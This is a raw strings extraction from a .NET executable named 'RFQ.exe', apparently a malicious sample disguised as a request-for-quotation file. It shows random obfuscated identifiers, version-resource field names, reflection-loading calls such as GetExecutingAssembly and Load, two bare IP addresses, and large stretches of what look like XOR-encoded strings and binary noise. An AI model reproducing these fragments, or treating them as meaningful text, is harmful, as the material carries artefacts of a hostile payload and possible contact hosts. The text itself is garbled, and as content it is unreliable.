RFQ.exe

i4evqTPnzVZXHzXC5COERP
doWMqHwaxoyeiMl44Ydw0ZLXMCHdvt9aLNVG15j
R2bdrUJ7JNwUJz4MmGDPqRFcic0DTvrs
tlsbsmEys8rkMelhvPQdlwZI1kLX8j
Comments
AqoY4Ms73ULALWhXlQm2hHf4UVdGUjg
JrRxX0s4w5IKyrXrJsfT1guGTDg1prYhFF
/EH
oNVlULKZiLX0G7m2rQmrV0Df566Klsy505
WUXKQhbvb828nN6XSuu6YtV3bU3JDJRj
bQW5LFtRAfvEbXhljY5s9SQ6F6n
qBSC7B92NyOViy
InternalName
0b5IM71ajdBXWVm2t4pJkXvxCgkS
EYXNf7U2SZI1dkAlBUsgAtouLbnc6H
efxWqBjPZURbATJA3GPjcuacuiWzqcpVMZdPFEo
tqT06BKhZ46A0pTLeyVuqPMZoqzr28
x3iYJP4yPoQHkBoVRkUTsnWNs7UozCoTx5
4ZbISIfhXOkDF5lJdaGV
bjcNRTp6HL5KHo3QKUSwO28yIIzDOAzThC68tow
mnFZa1iAh66uvqo2JrO7ldPvPC9d5mM9Lw9RQ5
o5ZOHjZ4DLHHbKuCVZZKHsCWmh51vaTczD
VW4nJCnOgraiH7yrkjsPDn
ksA85XIVzvwZBBDYl6KhL
oA3ajwhRmZMEx3GdcpaEZs5cVy2qW
RBIzDJTnmqrITcLQoYdn0WJ
514k5ubndSQCr1efUNJKBsVinOARLA56Tc
Z0q4GxgFYtVKYWqsfppn
6UHIMNgEkYf4NhFDb3wGKtYBxf011
8AfaE3K0Gp4F4JUB6xKm4fcEKWoWxGiDHg5Y8Q
StringFileInfo
JlnSCY53am8NCzVT3sLmEpgEQyiNb
fh8T0HZ4HGnBcg3BvD2yyf8
5KoVlfAeLL4kznEW2CwqvCACJTKMSLX
Translation
RFQ#35242411.exe
MHb2yXJIdAqjunfA9lMiCr
okXegq66nOsDkemEgrA38
dQ13f6eaVyYdtVEYF89Xn5HMHfquCf
LegalCopyright
D57fLubOYw63j3AQaGkCzY4UDWg7
4LKkiyoQnRHzga5e3PFK8KVXxQq6uRD
VarFileInfo
oyLSCqa91JZSu9U4i9XrUs9Skl
Sjd5LcmJBpq5kWFX7OOAHwQJBLhcBMSES
Vr9kLcPM6VEoDRSUM1W7RDqhet
a9Y5EtxfCHOM4zhEcnp0udTRELUyym3HihuCl
DEllFJttOk7e1kXnyArYIZ
Ps37FFNdEi4WXfJKAxTGy00R
I1SaBZtEoxdVKdXoC8TjRYOq4
4wQyNekOe66tyiBePH7MHhxEaQPxmvuR0d
k2d9WTKcN9VcVSfKb865gq3Pc7POojMr1I
rVii177mq4ME9JxzLVFfdY
xseiVWC99U4czHgXLCS9I17enGUhQyjnWR6P
SGzUUjHvgz5m7Gv2uuAeOtEHGDrL
GetExecutingAssembly
tdrcU4h6mhalRAjM086llV12dIRLa7dBX29Ic
WI5T6kanOqqWuc8uM0FjMirWWNHZYr
6eAQyack7DTV42CtYnolNFXNPW7BNgWIPui
WVc5z55lUVQqiBzQOzH8GWB5q8jeO33gnA
yQ2EouqSCAJhpN3TwWuD4ywmxkW
ZlLLEqixN8OPThWWe5NtgHq
FileVersion
6gMaXKE5Kbzy6ZVjZWYySQEFUgWgVZ
o59utZTeRVB9ygSTlpdH
CMiokWNMhAfgEeQTkek6mUbz
X9MKqrtI6O1mbNa56sfDsya6k8sYWwo9LE0
OE9JPEbpmXnAspE1lvKRAyAOigC38xMmtXIA
8KdHpjgQO6TZ6F3AJJtGW0d1
7YKziIiyPqnzst3E1m792sDOqjf6jEf6
kMk9mGo2Wj1AVv9ltz0TTO4ZsOEqnRi0Gwy6yJM
CZLZku4CZIMnSEewSqrqjKb4Y
1o0aMqoLl0wEiV30wTCxeC0a4tNCqzAsBRh1Idh
s3CIUZWjEIiYDj
Ng7ehyfpDpliOQV2ROrY
i6ncqGECBvyeMybYslwDV6KYvVGaq0yLSZoeE
Rpv3vFz7Ks0goge8FH7gfgz0n5txEzFIYpcG6
CvzLuLF3yqWI1MqL29KzEUOiN6x2Y60qjrYTPB
4BGgrlZRRQxTjsDkHhtUZWPXZSIlT92be
Z9BXgIbg4MjWpDDw3kUHihfleYhk
iGyXLfSwsF5Z4SBMWa9xw1x0AkFkSNIEG
FocDyN5UuaCyxvmQDzQM
IezXd4kjqXmoddF15L58CEwKRjaQwW
8OAFQzLJRnlMjCJib9af84MBydg1N1Z7d
dhS7i28X3gkyZDoI2BtJzi
3T0bmNneJXtUh3AgA2AfLS2w07a
0lqhXq3izPM8IndOwTq07n
JU01t5HDbZ2sdP4wtahG9g9k
mp5qq6cjOFffBON8b26NooxB7PZIAe4pfsa
30xYlzPlQeFIFVP9mGeh0ajmBN
SNEvDHXsfYBbyAgSVKqfI9FosJnCqTlCgy1
WW3s5cPZbhLCMezLhb8b0efxEJe1zNhW
ProductName
m9f2LaaO36Jj1T13ZD2qW6daubzNU
qQf3KALfq6HZPA8VXg44QXNhCND8xVGc
WkhmAtx8ksRjZwL09E9g5XfhlqKbUJocQfq
zi5zjah36oCoUXtwyXC2s2
DblI06W2175h6PrQgtBx
0JSjDWDM8vAejW5zkJhCdvKfjMGGIwlMhBTcpAI
IdblfOe5dPTUwwcyyFTPUKhfSz4YaT
sR97LNNuTJvrnT
HqrCPZ0IyYxgQ6TL4CB1doR8ow5Crr
ymmAeRQhKmRSRQGgZwfCmSewhzBV1a
MRBksHjJVHoi5yr7ZoAiR91xJ
Vmov7eENb3Z7UROg1TNeHK7pbE7oJ0Rgi
FileDescription
ProductVersion
MNlSjWYsCRcLSGvE30PU
2cDBMpE0pv9UDzPnn8fsRD5OC2B2fS7v
7EQ46afNlhmd5dG80KPg
T4ofOaLRhmvOpRWW5ajsKRCwq6lVUw51
WEN83973Ox5lo9B8VyXjOmSljppdfv70l8k
2lfT4udFN8nsxvMruhAWN2Qe1cz5Q2K58br
ElOpoENdkh121JLHrpTmpRkqtoRP
dzvIZykXiE17qYc8gtOQrCVuot
2pxlhLOaz4gWE2h9IFJpHvLS9GluIPJBfHbKmU
F4CvynwzbeSavaYAX3mYAQW7MfVxS8FA
y8wb5J347VvDtd7TRRsbD5Kj5GW
NCW43sKByV88z1PHPsnIfMMr9j9qOt99gkRRm7
6Zbi4PSa27g1n147GRLzpyigeVGZ4KLc4h
x8B3uDVTxrLz564ZjZUrpG
CREKkWPPAkai3LPytMAMW7NMoSyX8slrHp8Pg
CHkI4k8BGR6nopGWjB9j3mXuXgZqc6LD1r1Ert
WyyLqJV8C2Xcqlbr67ls
VS_VERSION_INFO
nr0S79Tzti1XdN6Nlgtmwo2mAUW83
W98E2uaPLLSEiQzx3sDBx90YqEBrCczveo
nI4w2YDQj9pSh1YMXGBqjH64bAFz0Ps5
eA45z2HZLxf9y77xjokRYcf69aGGDp9jmXMJTdj
ctZgXvWxYRXNqrxIzyEfq
1ofTZRl0DbGRNUiyUjcZj9F
IQk0zE5BOTw0gXnZ4QikOD
Lz7GAM9tQPuroL6jdaRg7S1dXDTaHc
Load
Y9tA3IIVWWUFjaagZ2q1La4D4h4TtibdeA
CompanyName
ZsPPMHESwIwgxq26JVLSLe4Xzwbk6X0
fB7xixEXnRpsfZdfqvkSpSRpnAfk9
M77YoMSiU9WbheG9MJwkr3hKBTniBFIee
RA2F82fSMOsUaBD5r8x3vsOpbJOtki6
j1mtAWeYq1x7XoEyCMjyjltZ87GOn6oh
z8O1ov4gL4BpvwHkbeMKr9iPb7ESr
2w7k4iYFjoFbi4z5BPDCdVfaQYDk4
U6LWKN5ddX9vkQOev4sBJC8ELXy
sGjvj80PJalD2l8GfNj5n25G
Assembly Version
JTsz49UQS1Lj93GPhi9uILAdiwQ
H11lqQTaIYHGsWFf5M2FHohmre6cAFO
biJ1vPsbZE5n3528PJvO6WlIYeCgBq5xc8CG
TJwNZwnARkOHkmnLVMRwfQ7Tl2nRMu8aFswv
UsOMMJX9yyFqvR4WVlpNUWrzj328On
RTrAE0iM1NIUhc1WVh7DWNpr
OxVvDjuSX2QUUYf1z1zVlHTTTa8L6K
7wZTxBv5IDpQxU3EhB84pbXabpWjNzUpzsYt
vUvnjrV1W6KwgPryC5o9dVdg2Mk2EkbH
V2KG8Tar0kg5n8n9PsuILJ59Rij
gQ96neTA1tmzJywFw790ssxLeUr6sWDu
grqpx6By9F0SGj4W1fBB
nW7i0itntr5PVhoJmJqgqMNhooxyrFe9EyFmO
ymu19Ts3ysArZoukHbj6h1tEYvN
yEJ7NBNQGfKigAWuqbvz99m4iG3YD2dDIeV
wFWy9BdQ6OGRe00ig9epqtW88Ztx
PLsJsNN1woxJFWyU6Llr6atoQxGOWgxAXCUeAM
FjSrbgTULwck20
PqAxzlEGagmaParM3AuLW6qpidS157
oBVB2iBsQZ51rP1mVONeJ
E9VGTI5vOpP16RVR8n9VV7k7rCVR7
MOXSHBEcVR3tVHt0LsAhr0Ygk2JnPGceuN
wvBMqtRPqJrlCdB82gh1QP
Zq2YvZWrSLcZ6twK86n5DsKhhV9YNbuhSf3IczE
000004b0
81.5.93.65
C3nBnxjHxg8DJAaNAlxap8WUVWevIAALTrd
5rlHZvyTxpAYHmrBWBHDOJoNSn9iE
VnfPYgyLQOqkLydzBSrYYi7QFLheH1Guex
fAKCuhWQMmoZPsHVMx0bn3vY0x3cKYJZSh
OriginalFilename
QPyoUQC4maOe89ZepQ8xJfpvFgObQAtP1x
r62YSOLCwEFGRGcJG0WH8MZxB
y2Wnx2LJ8WXxnp6RxsQsayat1GXbj
MHx1mUp3lLLfsPA1KmtSgncwo
61.23.32.25
tAQJ4oK5IqhS2v
i9RytQu2oD1yPCbF13Ry7sEFvd
SWjDUEDwPckZmHmwXhXEqXhZqwl7JXBN
EntryPoint
I4KxRTriDHHZqnrNNopn8Vl32i1
rySJCPPQvRSeNJU9M60KgkzEO0
CbmI1H5nzZ4RjpppJQHkzPe
CaA8aVc4EFq7ME5ETzAmdEf3YECd9RI6ExQEJJ
s7Q6dExTL2kmovD6b5xHTqyCxeRtt
K8K.K9K=K.K9K8KeK3K&K'KKKKKnK8K
KKKKKKKKJKKK
sCI.
O[pZUr
$&&$%
(.K
(.
'*,8K
(.
K"K?K.K9K*K?K.K
KKKK[KD8
KKKK[K^3
NJKK
FG
l
K2K)K.K9K-K$K3K
!K#JKK
6Np
bWCkIC[CY
K$K9K(K#KKK
K$K%K%K.K(K?K"K$K%K8KeK?K3K?KKK
K[KKfK[KK
Gz{C
K?Vrv
IKHKM
K*K"K'K
K?K*K9K?K>K;K
K$K9K(K.K
oOKK>
#\Z
K-
YRCKIJYVZ
#:7E
.88*,.K,.?
K*K&K.KC
cZXt
9,>&.%?8K8.?
K9K$K-K"K'K.K8KKKKKnK8K
>IKK
#kIKK!k!I
,Kt'
KKJK5
KBKJK
^xzQ
JJK#=KKKK
6CK?
8
/&"%K
//
JKIKIKIKIKIKKJKKK
dtPD
KKIKJKHKJKOKJKNKJKMKNKLKNKCKLKBKJKAKJK@KJKFKGKEKGKDKGK[KGKZKGKYKGKXKGK_KGK^KGK]KGK\KGKSKGKRKGKQKGKPKGKWKGKVKGKUKGKTKGKkKGKjKGKiKGKhKGKoKGKnKGKmKGKlKGKcKGKbKGKaKGK`KGKgKGKfKGKeKGKdKGKKKKK
YFKK
A?Ox
JRKY
K*K%K/K.K3K
PV
j
LMKd
s7Q6dExTL2kmovD6b5xHTqyCxeRtt
K*K?K#K*K&K
K%K*K)K'K.K/K|KKKi
UnverifiableCodeAttribute
K?K.K.K/K
|%z
oOKK>B
LMK?
.m"P
K>K%K*K8K(K*K;K.K}K
*88<$9/KKKnK8K
\FrKvKkFrK
O>z1"+
;,kG
y.?-
KHKKKOKKK
<36z;<
KMK@O[OMK\O[OMKjNgNMK}MgNMK
(,7Z
?9"%,K,.?
Y_PA
ZMKIWY~ELKJY
830G
_y?:
LKIY~EY
z9(
KKHK1
bSt9<
G
p>
oJKK#
oA7%
q]
K
6GK?G!K
KKHK!
K"K=K*K'K/K"KKK
&*,.
*%/'.K,.?
D4e+}
J!K5O!J
.88*,.	$3K
KnK8KnK8KKKgKKKcKKK
|AE
&s/
+
t!+
NKKPKKK
L>Nx
K.K%K(K
9";'.
r6G=b
%CREKkWPPAkai3LPytMAMW7NMoSyX8slrHp8Pg
KK6C
v
hJ
6CK?Y
e:4PLQ
N<KKKKKHK
_l\`3
i
B~
OtK
K/K.K%K?K"K?K"K.K8KKK
6CK?B
).na<;
K$K/K.K
f=
?
>%?"&.
".'/
"//.%u-*'8.wd
F!4fv&C
wKKKK[KS
6CK?M
K"K/K/K.K%KMKKKU
K?K?K9K"K)K>K?K.K
K/K"K%KkK
>&!z
(Vrj
!K!K#'
K$K%K K.K2KKKKK
KKHKW
.&*%/uFAkkkkw
/BrJ+
:>*'8K
*"'
*8?K8.?
3@v]
?{KKx
KKAK
OKKGNKK
#.''
yANX$kb
K*K&K.KKKKKKKKK
KJKWvKKKK[KqF'KJK
9<L
d`R\
#C3nBnxjHxg8DJAaNAlxap8WUVWevIAALTrd
@U_3 q
JKKVNKK
j8SD
$oH8
yK_K+
K;K9K$K-K"K'K.K8KeK3K&K'KKKKKnK8K
tlsbsmEys8rkMelhvPQdlwZI1kLX8j
K/JHJ[K
N{JKUKNKJCYFOKJSCMKIWSYFOcKZ3OcKZ?NcKZ
PKKfKMKyKNK[K
2%*&"(K
"3./K
K.K8K(K9K"K;K?K"K$K%KKKKKkKKK{KCKJK
K"K'K.K
System.Security
.KK]Ka-
K%K8K8 @
P>*R
HKKeJKK
%$<%
?Brv
yK_K
1$4G
dIKK
K*K"K%KKKKK
%;>?K
OtK#
K>K8K?K*K%K,KkK	K9K$K<K8K.K9KKKxK}K{K	K9K$K<K8K.K9K
}JKK!N
yKSKKKKK
>8?$&K
K(K$K%K?K9K$K'KKK-K$K9K&K
"oNVlULKZiLX0G7m2rQmrV0Df566Klsy505
uq?4
8IlX
S7ZN
K8K"K?K.K&K*K%K*K,K.K9KeK3K&K'KKKKKnK8K
*&.K8.?
*;;'
-R6tI
dAKJK
DTK
K8K"K?K.K8KeK3K&K'KKKnK8K
nr0S79Tzti1XdN6Nlgtmwo2mAUW83
Mo
K
=fkg
H#_ 
K
d94F
HKKxNKK3IKK
ECKJY
e?.3?KKK
OtK_
KKOK
K%K(K
Lz7GAM9tQPuroL6jdaRg7S1dXDTaHc
K[KK
K%K-K$KeK
9"?.K*K"K=*'>.K%>&)2?.8K
KwJHJKK
K<K(K3K
nMkHICCCGkNY
YIKK
K4}AKJK
Z ]+
92;?
H?>xM
9"%(";*'8uFAkkw
Y6VZ
FBNKKY
KKK#[)
K
vKKKK[K)C4KJK{vKKKK[K
=(#$8?K	9$<8.9K
K.K(K>K9K.K
K
|8
jl	P
]NRl
*FeY
g2A9v
K*K8K8K<K$K9K/KyKKKKK
IkKKKKK
('$8.KKK8:'"?.x
}{KK
(%V
$%->8./	2
??9")>?.K
??9")>?.K
aZQk
>x
p>
K'K'K
-[:Y
XBZE\
K
KK
K9K$K?K$K(K$K'KKKKK
K*K;K'K.K
I Xt;
K
K"K'K.K
K@J[K
H8B-r
KJKkuKKKK[K
K9K$K-K"K'K.K
d7	/
p
ow9a
?Z!H
HJmw
lJk
:/-u^
KKJKq
fP(2
k`&'h^
&2M
JKKKKKK
T(ZF
X@ZQk\M
*>'?KK
K/JKKKK
KFyK_K
?fSw
KKKK[K|,
r j|
#O)
K#7,
K
#9.*/K';
-;4s
KKKbGoD
3.(>?"%,
88.&)'2K,.?
'NtK
[JKK
C)zGSHX7
C<
K
KIIKK
<1LAC
/NKK
vKKKK[KT
K	K'K*K(K K
D=MqH
gk}^I
>S!\#
K"K9K.K(K?K$K9K2KKK
"'.
JEMKJVEVELKIJVNVEMKJEZ
*88<$9/KK
K
K$K8K8K*K
v2.0.50727
K	K'K*K(K KkK
!K!K!I#
>C#G
S=
K
Z_VZ_V
bA1Hk
.&*%/u?9>.wd
''$<
2H
K`
PropertyInfo
#L*k0:
*&.K.?
K9K.K-K.K9K.K%K(K.K8K
!K!K#H
TX\ZQk
K(n
W!+#
>C#o
0aKKx
VAK-;:;AK
owOKK
OAJY
KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
xGQ$q_
K*K?K#K
xAKJK
K/K*K?K*KKKKK
eaKKx
oOKK?q
tNtK
WKKK
ZQk-
}cy[s[
$&*"%K
_4gb5
H!K!JH
[OMK$
*.nQs
3dLH
P>du
>&;K.?
>LKKp
.98"8?*%(.u)
ZQk
K>K8K.K9K%K*K&K.K
[OQK
WK2pp
Y$W:
G5Ox
BYLM^Y
dM
K
#"8k;9$,9*&k(*%%$?k).k9>%k"%k
KrK)K"K8KeK(K$K&K
7T5
,_"'
f^#J
*&.K
2;.
9$&
"4wQyNekOe66tyiBePH7MHhxEaQPxmvuR0d
K#K9K$K&K.KKK
K8KKKKKKKKKKKK
KKKKKKKKKKKKKKJKKKKK
#S(
K
C>f}=)Q
!8OAFQzLJRnlMjCJib9af84MBydg1N1Z7d
KnK8KeKnK8KKKKKKKKKKKKKKKKKFAFA*
sa!
ZQkk
oOKK?9
KIJ@JCKK
HKKKKKKKKKKKKKkKK+KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
[MKK
YS}U"a
u|F+Y
AKKD
$''.(?K
r>_?)x
$>%?K
O8\p
#Blob
Op
O=Ox
MNlSjWYsCRcLSGvE30PU
!K!K#
'efxWqBjPZURbATJA3GPjcuacuiWzqcpVMZdPFEo
QJxG
VAKJK
CKJY
K
99*2K
+#gJKK
awVJ
K9K.K/K.K%K?K"K*K'K8KKKKK
.98"8?.%(.u)
?2'.K8.?
KJK3
?	!K
I1SaBZtEoxdVKdXoC8TjRYOq4
:/]e
4$-5
XK4X]
JHJKKQ
=F2c
94&=
K&K?K;K
.'.?.
"'.K
$&;*9.
99*28K*99*2K*99*2yK
?L!C
L.)
KxKyK	K"K?K
K?K;KeK"K%K"KKKnK8K
K>K)K8K2K8K?K.K&K
7
5$b
arNCb
/*R(
|?FD
EKKK
6[K?
)K-K$K9K&K
\cqX
)!.(?
?*9?
/
/&"%K
K.K9K8K"K$K%KKKKK
>*'"-".9K
H@M4@
`|fx
uSpvp
hU'I
nCkOCSC[CCEkMY
`MZBU
KCKJK
JBKIK
K9K$K-K"K'K.K8KKKaKeK8KKK
.*;
''$(K
NKKKKK
KKbK1K
zie'
uI\Ko
NAJZ
K"K?K.K8KeK
K*K?K*K'K"K%K*KK9K$K>K;K
!K!K#$
EwKk
7F8?
JbH9
;F2c
tID"
oNtK#
x8B3uDVTxrLz564ZjZUrpG
Z9BXgIbg4MjWpDDw3kUHihfleYhk
.98"8?.%(.K;"/K;9$(K
K*K?K*KKKKKnK8KnK8K
K>K8K.K9K/K*K?K*K
"%.K
ut
rNtK
E[=_
4l}
vVNOkJJE
M[JJUKEMKJJ[ZsBKOISB[Z
@a
j
K%K8K?K*K'K'K
KKKZQk
/BbJvKICbJ
.r[
JKKIFJ
KK-rJ>F
KKK
`$a|
xX
K
=.%?K/<
#g/
K
get_Name
'JKK
wKKKK[KuN
HK \
JAJ[K
K!K
K!H
K!I
XR(o
K!B
K*K8K?K
K/K/K9K.K8K8KKK
.9="(.8Kw
%="9$%&.%?K
#T5K#
LCKSIEKCKWI
%8?*%(.K
String
.(>9"?2
IVNOLISB	LdYnDNDNLLDNBDNDNDNDNDNCCCDNLCCBBVBVBVBCCDNBCDNBCBCCCCDNBCDNLCCSSBNLIY
ZXXFZQk
MKKVZ
8	*( ,9$>%/K
"x3iYJP4yPoQHkBoVRkUTsnWNs7UozCoTx5
K-K?K;K8K"K?K.KeK"K%K"KKKnK8K
K$K%K.K
KKJKF
K>K?K'K$K$K KKKKKKK
W#J]`
@gKvKAKgK
K#JKK
.ZAb
+LSX
K/JIJKKd
%/uFAkkkkkkw
K%K?K.K9K%K.K?KkK
1ItK
?o!I
o@KK!
'*88sKw
$;2K.?
*{9+
#[<
K
X]C$
>F!m
Dj]:}
K*K%K/K.K3K	K9K$K<K8K.K9KKKKK
JKJKKKKK[KKK=ye{e~{|y|KKKKKKKKBK
xy>@
#s"
K
{\KK
#7<
K
?9.*&K
$;.%z}KK8:'"?.x
s+@:
FCCOMZ
{xKK
\PU`
Q~xh
a}'
TM h
"''.9u)
a
bA
OAJY+MkIJEY
LLHY
Y6BGLMY
IY
VY
CBZLBEY
H-<Q
$;2K
Tq~q
LMKO3[OMKF2[OMK
!y!K
GetProperties
}KwK
H -
<OH|H
Qf/=
'$%./K
jGmHF
/#
K
M||[=M5
9.*?"$%
%8?*%(.KK$'.xye/''K
KMKy
K
K'K*K8K#K
K
K"K?K.KkK
P!d\^"
OHKKKOIKKKONKKKOOKKKOMKKKOCKKKOBKKKOLKKKHMZ;OKKKOKJKKHMY/HMZ7HMVBHUDCIMEJ_IMLOKKKKOK[KKNKJCVNBKNJVNCICCCKOJVNCCCMKJY
.text
List`1
je(B'b
g*s-
KKK#[OKK
La
e
OzX
uKKK
KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
lJKK
%*)'./u-*'8.wd
{T*$
GetObject
.-*>'?K
VJKK
8.9%*&.KKK.%(92;?./
%"($/.K%
>wVv
GK'
6GJ>6
:$v8D
%tdrcU4h6mhalRAjM086llV12dIRLa7dBX29Ic
KK
K
JJKK2KKKK
]kk.
-$"%,
HJKK>
Ss:#
K"K?K.K8KeK"K%K"KKKnK8K
K-K?K;KeK"K%K"KKKKKnK8K
$&&*%/un
K.%.9"(
(.K
p
O=B
.(>9"?2e
{gIg
K$K<K
KKK#G!
K
K;K9K$K-K"K'K.K8KeK"K%K"KKKKKKKnK8K
7E
JA_AOS-C
KhK%S
*8.
//9.88K.?
{#;<9
KhKpj
.=.'uFAkkkkwd
#*%(.K
tKKKKKKo{zyx
$/>'.K
rySJCPPQvRSeNJU9M60KgkzEO0
SvKAKJK
nmZQk
^mG~
K8K#K.K9K9K$K/KkK
K
?MIM
8]q?H
bWBkNISSBB[BDkLY
K$K&K;K>K?K.K9KgKkK
;@KK
!K!#
K9K$K-K"K'K.K8KfK!KeK!K8K/KKK
!C!J
dzlA
KKIK]
@r6_=H
7O&MKu6O&MK
N]QS>
UIj
KKIKW
OtK/
!#vt&6
cw
i
1BP3
.<hz
K8K"K
+\KK
K*K-K.K
N
KKKKKHK
K9K$K(K.K8K8K
G2oE
